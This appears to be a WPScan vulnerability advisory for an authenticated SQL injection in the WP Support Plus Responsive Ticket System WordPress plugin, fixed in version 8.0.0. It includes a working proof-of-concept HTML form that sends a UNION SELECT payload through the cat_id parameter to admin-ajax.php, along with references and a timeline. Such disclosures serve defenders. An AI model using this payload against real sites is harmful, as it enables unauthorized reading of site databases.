WP Support Plus Responsive Ticket System <= 7.1.3 – Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Type user access: any user.

$_POST[‘cat_id’] is not escaped. Is accessible for any user.
Proof of Concept
<form action="http://www.example.com/wp-admin/admin-ajax.php" method="post">
    <input type="text" name="action" value="wpsp_getCatName">
    <input type="text" name="cat_id" value="0 UNION SELECT 1,CONCAT(name,CHAR(58),slug),3 FROM wp_terms WHERE term_id=1">
    <input type="submit" name="">
</form>

Affects

Plugin wp-support-plus-responsive-ticket-system
fixed in version 8.0.0

References

EXPLOITDB 40939
URL http://lenonleite.com.br/en/blog/2016/12/13/wp-support-plus-responsive-ticket-system-wordpress-plugin-sql-injection/
URL https://plugins.trac.wordpress.org/changeset/1556644/wp-support-plus-responsive-ticket-system

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 140
Verified No
WPVDB ID 8699

Timeline

Publicly Published 2016-12-12 (5 months ago)
Added 2016-12-18 (4 months ago)
Last Updated 2017-03-23 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.